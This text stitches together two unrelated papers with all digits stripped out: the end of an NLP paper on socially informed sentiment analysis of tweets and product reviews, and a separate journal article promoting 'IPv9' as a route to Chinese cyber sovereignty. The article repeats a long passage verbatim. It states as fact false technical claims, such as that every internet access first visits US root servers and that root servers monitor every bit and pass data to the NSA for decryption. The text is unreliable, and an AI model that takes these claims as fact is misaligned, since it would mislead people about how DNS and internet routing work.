cry lmao super lol haha hahaha ruin silly bad boring dreadful lovatics wish beliebers arianators kendall table : top more positive/negative words for the basis models in the semeval training data. bolded entries correspond to words that are often used ironically, by top authors related to basis model and . underlined entries are swear words, which are sometimes used positively by top users corresponding to basis model . italic entries refer to celebrities and their fans, which usually appear in negative tweets by top authors for basis model . word sentiment example sick positive watch espn tonight to see me burning @user for a sick goal on the top ten. #realbackyardfifa bitch positive @user bitch u shoulda came with me saturday sooooo much fun. met romeo santos lmao na i met his look a like shit positive @user well shit! i hope your back for the morning show. i need you on my drive to cupertino on monday! have fun! dear negative dear spurs, you are out of coc, not in champions league and come may wont be in top . why do you even exist? wow negative wow. tiger fires a but not good enough. nick watney shoots a if he birdies the th?!? #sick lol negative lol super awkward if its hella foggy at rim tomorrow and the games suppose to be on tv lol uhhhh.. where’s the ball? lol table : tweet examples that contain sentiment words conveying specific sentiment meanings that differ from their common senses in the semeval training data. the sentiment labels are adopted from the semeval annotations. word w, we compute the difference between the model-specific probabilities p(y | x = w,z = k) and the average probabilities of all basis models k ∑k k= p(y | x = w,z = k) for positive and neg- ative classes. the five words in the negative and pos- itive lexicons with the highest scores for each model are presented in table . as shown in table , twitter users correspond- ing to basis models and often use some words ironically in their tweets. basis model tends to assign positive sentiment polarity to swear words, and twitter users related to basis model seem to be less fond of fans of certain celebrities. finally, basis model identifies twitter users that we have described in the introduction—they often adopt gen- eral negative words like ‘ill’, ‘sick’, and ‘suck’ posi- tively. examples containing some of these words are shown in table . . sentiment analysis of product reviews the labeled datasets for twitter sentiment analysis are relatively small; to evaluate our method on a larger dataset, we utilize a product review dataset by tang et al. ( ). the dataset consists of , reviews written by , users crawled from a popular product review sites, ciao. the rating information in discrete five-star range is avail- able for the reviews, which is treated as the ground truth label information for the reviews. moreover, the users of this site can mark explicit “trust” rela- tionships with each other, creating a social network. to select examples from this dataset, we first re- moved reviews that were marked by readers as “not useful.” we treated reviews with more than three stars as positive, and less than three stars as nega- tive; reviews with exactly three stars were removed. http://www.ciao.co.uk dataset # author # positive # negative # review train ciao , , , , dev ciao , , , test ciao , , , , total , , , , table : statistics of the ciao product review datasets. system test ciao cnn . mixture of experts . random attention . * concatenation . social attention . ** table : average f score on the ciao test set. the best results are in bold. results are marked with * and ** if they are significantly better than cnn and random atten- tion respectively, at p < . . we then sampled , reviews from this set, and split them randomly into training ( %), develop- ment ( %) and test sets ( %). the statistics of the resulting datasets are presented in table . we utilize , trust relations between , ciao users to train the author embeddings. we consider the , most frequent words in the datasets, and assign them pretrained word vec embeddings. as shown in table , the datasets have highly skewed class distributions. thus, we use the average f score of positive and negative classes as the evalu- ation metic. the evaluation results are presented in table . the best hyperparameters are generally the same as those for twitter sentiment analysis, except that the optimal number of basis models is , and the op- timal number of pretraining epochs is . mixture of experts and concatenation obtain slightly worse f scores than the baseline cnn system, but ran- dom attention performs significantly better. in con- trast to the semeval datasets, individual users of- ten contribute multiple reviews in the ciao datasets (the average number of reviews from an author is . ; table ). as an author tends to express similar opinions toward related products, random attention https://code.google.com/archive/p/ word vec is able to leverage the personalized information to improve sentiment analysis. prior work has inves- tigated the direction, obtaining positive results us- ing speaker adaptation techniques (al boni et al., ). finally, by exploiting the social network of trust relations, social attention obtains further improvements, outperforming random attention by a small but significant margin. related work domain adaptation and personalization do- main adaptation is a classic approach to handling the variation inherent in social media data (eisen- stein, ). early approaches to supervised do- main adaptation focused on adapting the classifier weights across domains, using enhanced feature spaces (daumé iii, ) or bayesian priors (chelba and acero, ; finkel and manning, ). re- cent work focuses on unsupervised domain adap- tation, which typically works by transforming the input feature space so as to overcome domain dif- ferences (blitzer et al., ). however, in many cases, the data has no natural partitioning into do- mains. in preliminary work, we constructed social network domains by running community detection algorithms on the author social network (fortunato, ). however, these algorithms proved to be un- stable on the sparse networks obtained from social media datasets, and offered minimal performance improvements. in this paper, we convert social net- work positions into node embeddings, and use an attentional component to smooth the classification rule across the embedding space. personalization has been an active research topic in areas such as speech recognition and information retrieval. standard techniques for these tasks include linear transformation of model parameters (legget- ter and woodland, ) and collaborative filter- ing (breese et al., ). these methods have re- cently been adapted to personalized sentiment anal- ysis (tang et al., a; al boni et al., ). su- pervised personalization typically requires labeled training examples for every individual user. in con- trast, by leveraging the social network structure, we can obtain personalization even when labeled data is unavailable for many authors. sentiment analysis with social relations previ- ous work on incorporating social relations into sen- timent classification has relied on the label consis- tency assumption, where the existence of social con- nections between users is taken as a clue that the sentiment polarities of the users’ messages should be similar. speriosu et al. ( ) construct a hetero- geneous network with tweets, users, and n-grams as nodes. each node is then associated with a senti- ment label distribution, and these label distributions are smoothed by label propagation over the graph. similar approaches are explored by hu et al. ( ), who employ the graph laplacian as a source of reg- ularization, and by tan et al. ( ) who take a fac- tor graph approach. a related idea is to label the sentiment of individuals in a social network towards each other: west et al. ( ) exploit the sociolog- ical theory of structural balance to improve the ac- curacy of dyadic sentiment labels in this setting. all of these efforts are based on the intuition that indi- vidual predictions p(y) should be smooth across the network. in contrast, our work is based on the in- tuition that social neighbors use language similarly, so they should have a similar conditional distribu- tion p(y | x). these intuitions are complementary: if both hold for a specific setting, then label consis- tency and linguistic consistency could in principle be combined to improve performance. social relations can also be applied to improve personalized sentiment analysis (song et al., ; wu and huang, ). song et al. ( ) present a latent factor model that alleviates the data sparsity problem by decomposing the messages into words that are represented by the weighted sentiment and topic units. social relations are further incorporated into the model based on the intuition that linked in- dividuals share similar interests with respect to the latent topics. wu and huang ( ) build a person- alized sentiment classifier for each author; socially connected users are encouraged to have similar user- specific classifier components. as discussed above, the main challenge in personalized sentiment analy- sis is to obtain labeled data for each individual au- thor. both papers employ distant supervision, using emoticons to label additional instances. however, emoticons may be unavailable for some authors or even for entire genres, such as reviews. further- more, the pragmatic function of emoticons is com- plex, and in many cases emoticons do not refer to sentiment (walther and d’addario, ). our ap- proach does not rely on distant supervision, and as- sumes only that the classification decision function should be smooth across the social network. conclusion this paper presents a new method for learning to overcome language variation, leveraging the ten- dency of socially proximate individuals to use lan- guage similarly—the phenomenon of linguistic ho- mophily. by learning basis models that focus on different local regions of the social network, our method is able to capture subtle shifts in meaning across the network. inspired by ensemble learn- ing, we have formulated this model by employing a social attention mechanism: the final prediction is the weighted combination of the outputs of the ba- sis models, and each author has a unique weight- ing, depending on their position in the social net- work. our model achieves significant improvements over standard convolutional networks, and ablation analyses show that social network information is the critical ingredient. in other work, language varia- tion has been shown to pose problems for the entire nlp stack, from part-of-speech tagging to informa- tion extraction. a key question for future research is whether we can learn a socially-infused ensemble that is useful across multiple tasks. acknowledgments we thank duen horng “polo” chau for discus- sions about community detection and ramon as- tudillo for sharing data and helping us to reproduce the nlse results. this research was supported by the national science foundation under award ri- , by the national institutes of health un- der award number r gm - , and by the air force office of scientific research. the content is solely the responsibility of the authors and does not necessarily represent the official views of these sponsors. references mohammad al boni, keira qi zhou, hongning wang, and matthew s gerber. . model adaptation for personalized opinion analysis. in proceedings of the association for computational linguistics (acl). ramon f astudillo, silvio amir, wang ling, mário silva, and isabel trancoso. . learning word rep- resentations from scarce and noisy data with embed- ding sub-spaces. in proceedings of the association for computational linguistics (acl). aiti aw, min zhang, juan xiao, and jian su. . a phrase-based statistical model for sms text normaliza- tion. in proceedings of the association for computa- tional linguistics (acl). justin basilico and thomas hofmann. . unify- ing collaborative and content-based filtering. in pro- ceedings of the international conference on machine learning (icml). john blitzer, ryan mcdonald, and fernando pereira. . domain adaptation with structural correspon- dence learning. in proceedings of empirical methods for natural language processing (emnlp). su lin blodgett, lisa green, and brendan o’connor. . demographic dialectal variation in social me- dia: a case study of african-american english. in pro- ceedings of empirical methods for natural language processing (emnlp). antoine bordes, nicolas usunier, alberto garcia-duran, jason weston, and oksana yakhnenko. . trans- lating embeddings for modeling multi-relational data. in neural information processing systems (nips). john s breese, david heckerman, and carl kadie. . empirical analysis of predictive algorithms for collab- orative filtering. in proceedings of uncertainty in ar- tificial intelligence (uai). john bryden, sebastian funk, and vincent jansen. . word usage mirrors community structure in the online social network twitter. epj data science, ( ). ciprian chelba and alex acero. . adaptation of maximum entropy capitalizer: little data can help a lot. computer speech & language, ( ). hal daumé iii. . frustratingly easy domain adapta- tion. in proceedings of the association for computa- tional linguistics (acl). penelope eckert and sally mcconnell-ginet. . lan- guage and gender. cambridge university press. jacob eisenstein, brendan o’connor, noah a. smith, and eric p. xing. . a latent variable model for geographic lexical variation. in proceedings of empirical methods for natural language processing (emnlp). jacob eisenstein. . what to do about bad language on the internet. in proceedings of the north american chapter of the association for computational linguis- tics (naacl). jacob eisenstein. . systematic patterning in phonologically-motivated orthographic variation. journal of sociolinguistics, . marcello federico. . bayesian estimation methods for n-gram language model adaptation. in proceed- ings of international conference on spoken language (icslp). jenny r. finkel and christopher manning. . hier- archical bayesian domain adaptation. in proceedings of the north american chapter of the association for computational linguistics (naacl). john l fischer. . social influences on the choice of a linguistic variant. word, . santo fortunato. . community detection in graphs. physics reports, ( ). lisa j. green. . african american english: a lin- guistic introduction. cambridge university press. aric a. hagberg, daniel a schult, and p swart. . exploring network structure, dynamics, and function using networkx. in proceedings of the th python in science conferences (scipy). matthias hagen, martin potthast, michael büchner, and benno stein. . webis: an ensemble for twitter sentiment detection. in proceedings of the th inter- national workshop on semantic evaluation. hussam hamdan, patrice bellot, and frederic bechet. . lsislif: feature extraction and label weighting for sentiment analysis in twitter. in proceedings of the th international workshop on semantic evaluation. dirk hovy. . demographic factors improve classifi- cation performance. in proceedings of the association for computational linguistics (acl). xia hu, lei tang, jiliang tang, and huan liu. . ex- ploiting social relations for sentiment analysis in mi- croblogging. in proceedings of web search and data mining (wsdm). bernardo huberman, daniel m. romero, and fang wu. . social networks that matter: twitter under the microscope. first monday, ( ). robert a jacobs, michael i jordan, steven j nowlan, and geoffrey e hinton. . adaptive mixtures of local experts. neural computation, ( ). jing jiang and chengxiang zhai. . instance weight- ing for domain adaptation in nlp. in proceedings of the association for computational linguistics (acl). nal kalchbrenner, edward grefenstette, and phil blun- som. . a convolutional neural network for mod- elling sentences. in proceedings of the association for computational linguistics (acl). yoon kim. . convolutional neural networks for sentence classification. in proceedings of empirical methods for natural language processing (emnlp). diederik kingma and jimmy ba. . adam: a method for stochastic optimization. arxiv preprint arxiv: . . william labov. . the social motivation of a sound change. word, ( ). yann lecun, bernhard boser, john s denker, donnie henderson, richard e howard, wayne hubbard, and lawrence d jackel. . backpropagation applied to handwritten zip code recognition. neural computa- tion, ( ). christopher j leggetter and philip c woodland. . maximum likelihood linear regression for speaker adaptation of continuous density hidden markov mod- els. computer speech & language, ( ). wang ling, chris dyer, alan black, and isabel trancoso. . two/too simple adaptations of word vec for syntax problems. in proceedings of the north ameri- can chapter of the association for computational lin- guistics (naacl). miller mcpherson, lynn smith-lovin, and james m cook. . birds of a feather: homophily in social networks. annual review of sociology. preslav nakov, zornitsa kozareva, alan ritter, sara rosenthal, veselin stoyanov, and theresa wilson. . semeval- task : sentiment analysis in twitter. in proceedings of the th international work- shop on semantic evaluation. mark ej newman. . the structure and function of complex networks. siam review, ( ). sara rosenthal and kathleen mckeown. . age pre- diction in blogs: a study of style, content, and online behavior in pre- and post-social media generations. in proceedings of the association for computational lin- guistics (acl). sara rosenthal, preslav nakov, svetlana kiritchenko, saif m mohammad, alan ritter, and veselin stoy- anov. . semeval- task : sentiment analy- sis in twitter. in proceedings of the th international workshop on semantic evaluation. aliaksei severyn and alessandro moschitti. . unitn: training deep convolutional neural network for twitter sentiment classification. in proceedings of the th international workshop on semantic evaluation. xuehua shen, bin tan, and chengxiang zhai. . im- plicit user modeling for personalized search. in pro- ceedings of the international conference on informa- tion and knowledge management (cikm). kaisong song, shi feng, wei gao, daling wang, ge yu, and kam-fai wong. . personalized senti- ment classification based on latent individuality of mi- croblog users. in proceedings of the th interna- tional joint conference on artificial intelligence (ij- cai). michael speriosu, nikita sudan, sid upadhyay, and ja- son baldridge. . twitter polarity classification with label propagation over lexical links and the fol- lower graph. in proceedings of empirical methods for natural language processing (emnlp). r. sproat, a.w. black, s. chen, s. kumar, m. osten- dorf, and c. richards. . normalization of non- standard words. computer speech & language, ( ). chenhao tan, lillian lee, jie tang, long jiang, ming zhou, and ping li. . user-level sentiment anal- ysis incorporating social networks. in proceedings of knowledge discovery and data mining (kdd). jiliang tang, huiji gao, and huan liu. . mtrust: discerning multi-faceted trust in a connected world. in proceedings of web search and data mining (wsdm). duyu tang, furu wei, bing qin, ming zhou, and ting liu. . building large-scale twitter-specific senti- ment lexicon: a representation learning approach. in proceedings of the international conference on com- putational linguistics (coling). duyu tang, bing qin, and ting liu. a. learning se- mantic representations of users and products for docu- ment level sentiment classification. in proceedings of the association for computational linguistics (acl). jian tang, meng qu, mingzhe wang, ming zhang, jun yan, and qiaozhu mei. b. line: large-scale in- formation network embedding. in proceedings of the conference on world-wide web (www). mike thelwall. . homophily in myspace. journal of the american society for information science and technology, ( ). matt thomas, bo pang, and lillian lee. . get out the vote: determining support or opposition from congressional floor-debate transcripts. in proceed- ings of empirical methods for natural language pro- cessing (emnlp). peter trudgill. . linguistic change and diffusion: description and explanation in sociolinguistic dialect geography. language in society, ( ). joseph b. walther and kyle p. d’addario. . the impacts of emoticons on message interpretation in computer-mediated communication. social science computer review, ( ). zhen wang, jianwen zhang, jianlin feng, and zheng chen. . knowledge graph embedding by trans- lating on hyperplanes. in proceedings of the national conference on artificial intelligence (aaai). robert west, hristo paskov, jure leskovec, and christo- pher potts. . exploiting social network structure for person-to-person sentiment analysis. transactions of the association for computational linguistics, . caroline winterer. . where is america in the re- public of letters? modern intellectual history, ( ). fangzhao wu and yongfeng huang. . personal- ized microblog sentiment classification via multi-task learning. in proceedings of the national conference on artificial intelligence (aaai). paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , ipv is the foundation of the future digital world lou peide . china mobile communication federation . beijing university of posts and telecommunications beijing, , china e-mail: @ .com xu fei . state and provincial joint engineering lab. of advanced network, monitoring and control, china . school of computer science and engineering xi'an technological university, xi'an , china e-mail: china @qq.com abstract—the share of the network economy has already accounted for % of china's gdp, and its importance is self- evident. the two biggest problems involved in the network are network sovereignty and broadband charges, and the sovereignty of cyberspace is the "life gate" of the network. china’s cyber sovereignty is subject to the united states, resulting in political oppression, security, and economic exploitation. therefore, without cyber sovereignty, there would be no national security without cyber security. ipv has become the key to china's acquisition of network sovereignty. it is not only a technological innovation, but also related to national security and various cost savings, and can realize the autonomy and control of the network. keywords-ipv component; ipv ; cyberspace sovereignty; digital china i. introduction i am very glad to share a topic with you, that is, to see the network foundation of digital china from the "life gate" of the internet. why are we talking about this? you know, everybody's life cannot leave the network and we surf the internet every day. now the internet economy has accounted for % of the gdp, the importance of the internet becomes more and more prominent, so the basic work related to the internet becomes even more important. there are two biggest problems. one is the issue of cyber sovereignty, it's necessary to find out whose web we're on. obviously, it's the american internet. that is why president xi has said he wants to uphold cyber sovereignty. but how we assert our sovereignty over the internet is still a challenge. the second problem is that premier li keqiang said that he hoped the operators would speed up, reduce the cost, and reduce the bandwidth cost for the majority of small and medium-sized enterprises to access the internet, but how to reduce the bandwidth cost of internet access is a difficult problem. what are the reasons for the difficulties in solving the two major problems? we are going to look at it on a case-by-case basis, and to tell you what solutions we have. ii. the definition of cyberspace first, it is very important to have a definition of cyberspace. how do we assert sovereignty over cyberspace? this is not even properly defined in the media right now, and we think it needs to be properly defined. cyberspace is a virtual space with three basic elements/virtual and real combined and dominated by virtual: a. physical infrastructure of network transmission (all kinds of routers, servers, switches, national backbone optical cable/satellite transmission system, local cable/wireless user network, including g/ g/ g mobile communication network, nbiot internet of things, idc, etc.) b. data communication technology standards and protocols and the full root domain name resolution service system. c. application environment and users (including various terminals of chips and software, application standards, tens of thousands of service contents, hundreds of millions of users, etc.) iii. cyberspace sovereignty the most important leadership position in this virtual cyberspace is not the infrastructure or our application environment, but the entire root system. this has to be clear, and if this is not clear then a lot of the explanations are going to go awry. the leading core of cyberspace sovereignty is the data communication technology standard protocol (currently includes the ipv ,ipv of the world's existing equipment and the future network / ipv before and after the three generations of network data communication standards and protocols), as well as the formation of the network address space distribution, the resolution specifically, who has mastered the core assets of cyberspace: the main root/female root server/ root name servers, the ip/asset equipment/operation management rights of the doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , address/domain name resolution system, whoever has mastered the sovereignty of cyberspace. therefore, we have to make a very clear statement, what is cyberspace sovereignty. the working principle of the current public network is not thoroughly understood. actually, this is very important. this determines how to adhere to the cyberspace sovereignty. this is determined by the basic principles. any time we access the network, including any computer or mobile phone, we must first access the root server: the root system contains the parent root server and the primary root server (the publishing host). this hidden publishing host has only root name servers ( root name servers). all are affirmative) can access and maintain this hidden publishing host. the root domain name servers read the primary root server first, then read the parent root server, and then obtain the data, then read by the mirror server, and then spread to the entire network. any network visit in the country, first of all to visit the united states, and now some people say that we have a lot of visits are not going abroad, and indeed some businesses temporarily feel that they are not going abroad, in fact, the mirror root server is working, the cache server is working. the internet has four mirror servers in china, which are completely controlled in the united states. the commonly used urls can be parsed locally, and data can be cached locally to prevent network congestion. however, the parent root of the internet can back up the entire network, and all traffic can still go out. although most of the data traffic business is domestic. this is why the united states monitors the world through the internet, and because of economic reasons, the data traffic to the root system is two-way billing. in january of this year, china’s telecom business totaled . billion yuan, internet and related services business revenue was . billion, and carrier telecommunications business revenue was . billion, of which - - = billion may be largely two-way traffic charges for renting the internet/access to the internet! there is a set of data to prove that china's international bandwidth in was . t, while information consumption was . trillion. in our national informationization development program, we will explain billion yuan of information consumption in , t of international export bandwidth, trillion yuan of information consumption by , and t of international export bandwidth. the increase in the bandwidth of international bandwidth is seriously related to the increase in the total amount of information consumption in the country, and the sum of the income of internet companies and the income of operators often accounts for less than half of the total amount of information consumed in china. therefore, the more the network economy develops, the greater the contribution to the united states! security is more restricted by the united states! since every time the network visits go abroad, huge traffic to the united states, the united states charges us two- way, the money is taken away by others, and this information consumption accounts for even more than %. but in fact, most of our visits are domestic visits, and our traffic has also gone out, so it is wasted. more than half of our information consumption can actually be saved. why did premier li keqiang propose that it is very difficult to achieve bandwidth growth and slowdown of operators? in fact, the basic principles of the work of the internet have determined this. the most important leadership position in this virtual cyberspace is not the infrastructure or our application environment, but the entire root system. this has to be clear, and if this is not clear then a lot of the explanations are going to go awry. the leading core of cyberspace sovereignty is the data communication technology standard protocol (currently includes the ipv ,ipv of the world's existing equipment and the future network / ipv before and after the three generations of network data communication standards and protocols), as well as the formation of the network address space distribution, the resolution specifically, who has mastered the core assets of cyberspace: the main root/female root server/ root name servers, the ip/asset equipment/operation management rights of the address/domain name resolution system, whoever has mastered the sovereignty of cyberspace. therefore, we have to make a very clear statement, what is cyberspace sovereignty. the working principle of the current public network is not thoroughly understood. actually, this is very important. this determines how to adhere to the cyberspace sovereignty. this is determined by the basic principles. any time we access the network, including any computer or mobile phone, we must first access the root server: the root system contains the parent root server and the primary root server (the publishing host). this hidden publishing host has only root name servers ( root name servers). all are affirmative) can access and maintain this hidden publishing host. the root domain name servers read the primary root server first, then read the parent root server, and then obtain the data, then read by the mirror server, and then spread to the entire network. international journal of advanced network, monitoring and controls volume , no. , any network visit in the country, first of all to visit the united states, and now some people say that we have a lot of visits are not going abroad, and indeed some businesses temporarily feel that they are not going abroad, in fact, the mirror root server is working, the cache server is working. the internet has four mirror servers in china, which are completely controlled in the united states. the commonly used urls can be parsed locally, and data can be cached locally to prevent network congestion. however, the parent root of the internet can back up the entire network, and all traffic can still go out. although most of the data traffic business is domestic. this is why the united states monitors the world through the internet, and because of economic reasons, the data traffic to the root system is two-way billing. in january of this year, china’s telecom business totaled . billion yuan, internet and related services business revenue was . billion, and carrier telecommunications business revenue was . billion, of which - - = billion may be largely two-way traffic charges for renting the internet/access to the internet! there is a set of data to prove that china's international bandwidth in was . t, while information consumption was . trillion. in our national informationization development program, we will explain billion yuan of information consumption in , t of international export bandwidth, trillion yuan of information consumption by , and t of international export bandwidth. the increase in the bandwidth of international bandwidth is seriously related to the increase in the total amount of information consumption in the country, and the sum of the income of internet companies and the income of operators often accounts for less than half of the total amount of information consumed in china. therefore, the more the network economy develops, the greater the contribution to the united states! security is more restricted by the united states! since every time the network visits go abroad, huge traffic to the united states, the united states charges us two- way, the money is taken away by others, and this information consumption accounts for even more than %. but in fact, most of our visits are domestic visits, and our traffic has also gone out, so it is wasted. more than half of our information consumption can actually be saved. why did premier li keqiang propose that it is very difficult to achieve bandwidth growth and slowdown of operators? in fact, the basic principles of the work of the internet have determined this. iv. the"life gate" of the internet president xi jinping clearly pointed out in the " . " speech in : "the core technology of the internet is our biggest 'life gate', and the core technology is subject to others is our biggest hidden danger." the key is how to interpret what president xi jinping said is "the gate of life". what is core technology disciplined by others? the entire chinese society from all walks of life has misread the great majority! or some people just read it selectively! in fact, at the second world internet conference in wuzhen town, president xi put forward the "four principles and five propositions" for the first time, the first principle adheres to the sovereignty of the network and points out that is the "life gate"! now the taproot ipv / ipv internet/mother root server / root name servers all mainly by the innovative research and development, control and operation management, resulting in what we call the chinese internet is internet access network sovereignty belongs to the united states, about sign at the gate at the beginning of each year (this contract is governed by california law, file closed) the rule by the root name server system access to the internet, a year spent wholesale lease vast address (ipv each year about million addresses have been rental, $ million * . / a of about $ billion;ipv if lease around billion addresses per year, a total of $ billion * . / an effective address) (about $ billion), controlled for dns/routing addressing, the national public data are forced to deliver a huge sum of money through the pacific accept comprehensive monitoring cable to the root domain name system (root system can monitor each ip address of each bits), and will always face the danger of offline (the us congress has granted the president of the united states the right to cut off the network partially or completely in one country in )! the root system is the strict meaning of the internet's life gate! the real core technology of the internet is the entire root domain name service system and the corresponding network standard system and intellectual property system that can form network sovereignty. at present, china's cyber sovereignty is subject to people, causing political oppression and security to be monitored. the economic exploitation is the biggest hidden danger of china as a sovereign independent country (overall national sovereignty in the sea, land, air, day, five territories in cyberspace, china is currently facing the challenges of the united states in terms of sea, land and air, but the cyberspace is completely invaded!). international journal of advanced network, monitoring and controls volume , no. , therefore, we put forward a point that without cyber security, there would be no national security. we should add that without cyber sovereignty, there would be no cyber security, and there would be no national security. because the whole network information security framework can be divided into three levels: a. encrypted information information security of various businesses in the network application layer, including virus killing, trojan horse prevention, firewall reinforcement, and active defense against network attacks. the vast majority of chinese network security companies are engaged in this aspect of information security, and a lot of information security is mainly supported by encryption technology. as long as it is targeted by capable hackers, information leakage and decryption is only a matter of time. b. network core equipment and terminal network core equipment and terminal lack of core soul, refers to the cpu core chip and os operating system / database from the united states eight king kong, so the information of this device is transparent to the eight vajra of the united states and nsa! now some people directly regard china's lack of core soul, supply chain issues as the network development of the 'life gate' is also reasonable, but the 'life gate' still has the overall situation and local, the biggest and the next biggest difference! c. lack of cyber sovereignty sovereign loss caused by the network information security is overall, we are the united states the world's largest internet access user power, each bit under each communication ip address is monitored by the us internet root system. all data can be sent by china via pacific cable to the us national security bureau determined by the us internet root system for big data analysis and inspection, and then stored and archived. the information is decrypted according to the specific situation! moreover, in the internet world, it has become the prerogative of the president of the united states to be able to discontinue all or part or certain ip addresses in china. this is china's digital china/digital economy in the new era of construction projects in the data communication infrastructure network encountered the greatest danger! that is like building houses on the foundation of other people's walls. no matter how big and beautiful they are, they may be vulnerable to wind and rain or even a single blow. the most important problem of information security caused by the lack of network sovereignty is not mentioned in the media. even if the plan of xiong’an new area requires every manhole cover and every tree in xiong’an to have an ip address (apparently the ipv address of the internet in the united states), we are all afraid and sweat on our backs. in view of the fact that the strategic interaction struggle between china and the united states has entered a new grim state, we believe that it is time to address this issue and we must do so. v. development of ipv in china in order to change the serious strategic passive situation of china's cyberspace, to defend china's cyber sovereignty, and to build a new generation of domestic sovereign network with independent and controllable security, relevant ministries and commissions of the state council and the cpc central committee/state council have already made important arrangements: in september , china’s ministry of industry and information technology formally established the "decimal network standard working group". on january , , during the th collective study session of the political bureau of the central committee of the cpc, general secretary hu jintao stressed that "we must build, utilize and manage the new generation of internet well with a positive attitude and innovative spirit". president xi jinping, then a member of the standing committee of the political bureau of the cpc central committee and vice president of the cpc central party school, organized and completed the strategic research report on "accelerating the promotion and application of china's new-generation internet of independent innovation". in august , the ministry of information industry officially defined ipv as the new generation internet to distinguish ipv from the next generation internet. on february , , the state council issued a notice on the national medium and long-term plan for the construction of major scientific and technological infrastructure ( - ). it was pointed out in the key future network test facilities built in the th five- year plan period that "the internet based on tcp/ip protocol cannot meet the needs of future development relying on increasing bandwidth and gradual improvement. to break through the future network basic theory and support a new generation of internet experiment, test facilities, construction of the future network mainly include: the original network international journal of advanced network, monitoring and controls volume , no. , equipment system, resource monitoring management system, covering the cloud computing services, internet applications, spatial information network simulation, network information security, high performance integrated circuit verification and quantum communication network, the open network test system. therefore, it is obviously incorrect for some network academician experts to define the future network as "the intelligent network expressway to be built on the basis of the existing network architecture". in fact, this expert is responsible for the intelligent routing of china's access network controlled by the internet in the united states. << naming and addressing >> and << security >> and other core parts in the future network international standard officially released by iso/iec in december are led by chinese experts, and china has core intellectual property rights. the future network has a clear and distinct definition, the united states, russia, canada, south korea and other major countries have voted in favor. on june , , the ministry of industry and information technology released relevant industry standards implemented by ipv nationwide: sj/t , sj/t , sj/t , sj/t . this marks after years of hard struggle, the chinese government uses the independent research and development of mature able taproot mother/root/from n - z named root name server system, the core backbone routers and user router products with independent intellectual property rights has begun construction, and really have our network sovereignty of the world's second an independent of the united states the internet but also compatible with the computer communication network of the internet. at present, the ipv national backbone network has covered major cities such as beijing/shanghai/hangzhou. based on the unique characteristics of ipv -compatible ipv (ipv ) networks, ipv network services can cover the whole country or even the whole world. china’s network of 'life gate' can finally be held in the hands of the chinese themselves. some academicians say that "ipv is a private network that can only be used domestically, not internationalized" is also incorrect. under the guidance of the government, enterprises will play a leading role in promoting the commercial application/industrial development of ipv next generation internet in civil areas such as government, provincial and ministerial-level exothermic websites/to build a world community with a shared future in cyberspace. at the same time for able based or a new generation of internet, the future network file to accelerate national future requirements of the network test facilities and other major scientific research infrastructure construction, actively develop the network new technology, new application of the test and application demonstration, significantly enhanced the network information technology independent innovation ability, form the future network technology first-mover advantage! obviously in liangban file highlighted the ipv application field is limited to outside the government net, and other civil market, high-rank, government network and important industries such as finance, electric power, energy, customs, tax and health care infrastructure information applications involving state sovereignty must use our sovereignty network able to fundamentally to ensure the safety of network information. now ipv has carried out extensive scale demonstration experiments in these areas of military/government/financial/electricity/medical health/e-commerce/smart cities in china. today, our china-led future network/ipv (compatible with ipv /ipv , covering china, and reaching the world!) participated in the theme report of the “one belt, one road” park construction international cooperation summit hosted by china enterprise news group! and the actual working system is demonstrated in the field. this demonstration system shows that relying on the compatibility of v , any user of v can use the v /v dual-stack user router (with at least / / independent effective communication addresses). the existing fixed/mobile/satellite network can access the backbone core network of v , so as to quickly reach china and reach the global development goals. welcome everyone to visit and guide. the main features of the future network /ipv are: ) the future network /ipv master/master /n_z root systems, domain name resolution system, backbone routers/user routers are all independently developed and produced by china, including the core network of ipv system independently built and operated by china! ) ipv is ipv /ipv compatible and supports existing ipv services! ) to ensure data security, public network data is no longer subject to the control of the us internet, and no longer travels across the ocean to hand over data to the united states, which is both safe and substantial in international journal of advanced network, monitoring and controls volume , no. , saving network access costs. the bottom layer of the network itself increases the security mechanism that ipv /ipv does not have. the address can be encrypted, and the communication can be verified first. ipv supports vpn private network, which can carry out data communication security. ) high-speed broadband, controllable routing, and the future network /ipv tcp/ip/m protocol can support imax/ china's giant screen urban cinema film broadcast. ) completed the research and development of linux unicorn operating system with ipv /ipv kernel support, and completed the research and development of firefox browser with ipv /ipv kernel support! ) the network address is extremely rich, and the location/industry category is included. in the future, the network/ipv starts with the address ^ power, and the network address does not need to be leased to the united states, which greatly reduces the social cost and allows customers to build various kinds of their own. regional/industry networks, security and controllable, reducing network congestion and transmission costs are especially important for smart society/digital china construction. ) digital asset management, powerful functions, the number of addresses used to manage digital assets can be up to ^ power, can support the construction of china's sovereign digital currency! ) the party, government and military special industry should continue to go to the ipv /ipv internet in the united states, and vigorously develop domestic independent, safe and controllable ipv network. looking ahead to the market development in cyberspace in the next five to ten years: ) ordinary civil domestic market, ipv /ipv /ipv can develop freely. ) the general international market, including one belt and one road overseas market, can also promote the formation of ipv /ipv /ipv free competition development situation. ) the future network/ipv is an important foundation for the future iso/iec future network standards, and is the core foundation for the future digital world/digital china, creating a community of future cyberspace destiny. future network/ipv can not only meet the global -year communication address demand, but also an important tool for digital asset management, an important carrier for national sovereign digital currency issuance! we are full of confidence in the future development of china's future network / ipv next-generation internet! mr. lou was born in , in jiangsu province; he is mainly engaged in research in mobile multimedia information terminals and mobile information technology, industrial policy, and mobile digital media arts and technology. he was awarded the advance of science and technology award of mei and shanghai city, country inventing award , the country inventing exhibition gold award , the international inventing exhibition silver award, the top-ten distinguished sichuan province youth teacher rewards, sichuan province youth science and technology rewards. he was the member of optical fiber communication expert group of natioanal" " telecom subject of " "project, director of wireless division of department of telecom production of mei, director of telecom division of department of electronic information production management of mii. he promoted and planned the implementation of national mobile communication industry specific projects, made great effort to establishment and development of china mobile communication domestic handset industry. mr. lou is executive secretary-general of china mobile communications association, director of the standardization technical committee of multimedia communication and broadcasting of china association for standardization. references [ ] xie jianping etc. a method of assigning addresses to network computers using the full decimal algorithm [p]. cn: zl . , . . . [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s. deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks. rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . [ ] xie jianping, xu dongmei, etc. digital domain name specification. sj/t - , . . [ ] information technology-future network- problem statement and requirement-part : naming 